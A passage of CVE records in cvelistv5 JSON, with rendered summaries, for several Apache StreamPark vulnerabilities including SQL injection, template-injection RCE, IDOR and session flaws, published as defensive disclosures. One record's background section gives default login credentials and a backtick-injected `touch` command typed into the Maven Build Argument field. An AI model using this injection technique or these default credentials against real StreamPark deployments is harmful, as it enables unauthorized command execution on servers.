"url": "http://www.openwall.com/lists/oss-security/2025/09/04/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.6",
"status": "affected",
"version": "2.1.4",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Liufeng Yi (ylf@yiliufeng.net)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIncorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-279",
"description": "CWE-279 Incorrect Execution-Assigned Permissions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T09:52:26.810Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Authenticated users can trigger remote command execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-30001",
"datePublished": "2025-10-10T09:52:26.810Z",
"dateReserved": "2025-03-13T15:21:07.661Z",
"dateUpdated": "2025-11-04T21:09:55.311Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-48988 (GCVE-0-2024-48988)
Vulnerability from cvelistv5 – Published: 2025-08-22 18:24 – Updated: 2025-11-04 21:09
VLAI?
Title
Apache StreamPark: SQL injection vulnerability
Summary
SQL Injection vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.
It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication).
As a result, the associated risk is considered relatively low.
Severity ?
No CVSS data available.
CWE
- CWE-564 - SQL Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.1.4 , < 2.1.6
(semver)
|
Credits
Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-48988",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-22T18:46:36.076690Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T18:47:04.200Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:09:00.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/08/22/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.6",
"status": "affected",
"version": "2.1.4",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSQL Injection vulnerability in Apache StreamPark.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\u003c/p\u003e\u003cbr\u003eThis vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.\u003cbr\u003eIt can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). \u003cbr\u003eAs a result, the associated risk is considered relatively low.\u003cbr\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "SQL Injection vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\n\n\nThis vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.\nIt can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). \nAs a result, the associated risk is considered relatively low."
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-564",
"description": "CWE-564 SQL Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T18:24:22.144Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/26ng8388l93zwjrst560cbjz9x7wpq1s"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: SQL injection vulnerability",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-48988",
"datePublished": "2025-08-22T18:24:22.144Z",
"dateReserved": "2024-10-11T12:07:26.343Z",
"dateUpdated": "2025-11-04T21:09:00.563Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-29070 (GCVE-0-2024-29070)
Vulnerability from cvelistv5 – Published: 2024-07-23 08:13 – Updated: 2024-09-13 17:04
VLAI?
Title
Apache StreamPark: session not invalidated after logout
Summary
On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-613 - Insufficient Session Expiration
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache_software_foundation:apache_streampark:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "apache_streampark",
"vendor": "apache_software_foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29070",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T14:42:15.338950Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T14:47:17.230Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-13T17:04:30.274Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "On versions before 2.1.4,\u0026nbsp;session is not invalidated after logout. When the user logged in successfully, the Backend service returns \"Authorization\" as the front-end authentication credential. \"Authorization\" can still initiate requests and access data even after logout.\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4,\u00a0session is not invalidated after logout. When the user logged in successfully, the Backend service returns \"Authorization\" as the front-end authentication credential. \"Authorization\" can still initiate requests and access data even after logout.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-613",
"description": "CWE-613 Insufficient Session Expiration",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T08:13:41.408Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: session not invalidated after logout",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29070",
"datePublished": "2024-07-23T08:13:41.408Z",
"dateReserved": "2024-03-15T03:21:44.446Z",
"dateUpdated": "2024-09-13T17:04:30.274Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-34457 (GCVE-0-2024-34457)
Vulnerability from cvelistv5 – Published: 2024-07-22 09:48 – Updated: 2024-11-04 21:27
VLAI?
Title
Apache StreamPark IDOR Vulnerability
Summary
On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-34457",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-22T17:57:18.100067Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T21:27:42.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T02:51:11.536Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eOn versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone\u0027s user flink information, including executeSQL and config.\u003cbr\u003e\u003c/div\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone\u0027s user flink information, including executeSQL and config.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T11:03:07.865Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
},
{
"url": "https://www.openwall.com/lists/oss-security/2024/07/22/2"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark IDOR Vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-34457",
"datePublished": "2024-07-22T09:48:23.130Z",
"dateReserved": "2024-05-04T01:42:52.214Z",
"dateUpdated": "2024-11-04T21:27:42.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-29178 (GCVE-0-2024-29178)
Vulnerability from cvelistv5 – Published: 2024-07-18 11:15 – Updated: 2025-02-13 17:47
VLAI?
Title
Apache StreamPark: FreeMarker SSTI RCE Vulnerability
Summary
On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:streampark:1.0.0:-:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "streampark",
"vendor": "apache",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29178",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-18T13:21:44.462964Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-18T13:37:53.581Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:10:54.085Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eOn versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server,\u0026nbsp;The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.\u003cbr\u003e\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server,\u00a0The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-18T11:20:07.243Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: FreeMarker SSTI RCE Vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29178",
"datePublished": "2024-07-18T11:15:56.706Z",
"dateReserved": "2024-03-18T16:34:46.011Z",
"dateUpdated": "2025-02-13T17:47:39.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-29120 (GCVE-0-2024-29120)
Vulnerability from cvelistv5 – Published: 2024-07-17 14:59 – Updated: 2025-02-13 17:47
VLAI?
Title
Apache StreamPark: Information leakage vulnerability
Summary
In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. User can use this credential to request other users' information, including the administrator's username, password, salt value, etc.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29120",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T18:16:06.842752Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-922",
"description": "CWE-922 Insecure Storage of Sensitive Information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-14T16:46:42.096Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:03:51.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "In Streampark (version \u0026lt; \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e2.1.4\u003c/span\u003e), when a user logged in successfully, the Backend service would return \"Authorization\" as the front-end authentication credential. User can use this credential to request other users\u0027 information, including the administrator\u0027s username, password, salt value, etc.\u0026nbsp;\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "In Streampark (version \u003c 2.1.4), when a user logged in successfully, the Backend service would return \"Authorization\" as the front-end authentication credential. User can use this credential to request other users\u0027 information, including the administrator\u0027s username, password, salt value, etc.\u00a0\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-212",
"description": "CWE-212 Improper Removal of Sensitive Information Before Storage or Transfer",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T15:00:09.103Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Information leakage vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29120",
"datePublished": "2024-07-17T14:59:04.540Z",
"dateReserved": "2024-03-16T00:04:05.820Z",
"dateUpdated": "2025-02-13T17:47:37.551Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-29737 (GCVE-0-2024-29737)
Vulnerability from cvelistv5 – Published: 2024-07-17 08:21 – Updated: 2025-02-13 17:47
VLAI?
Title
Apache StreamPark (incubating): maven build params could trigger remote command execution
Summary
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.4
Background info:
Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build.
In the latest version, the special symbol ` is intercepted.
Severity ?
No CVSS data available.
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark (incubating) |
Affected:
2.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "streampark",
"vendor": "apache",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29737",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-18T15:08:55.540743Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-22T15:29:56.839Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:10:55.460Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark (incubating)",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
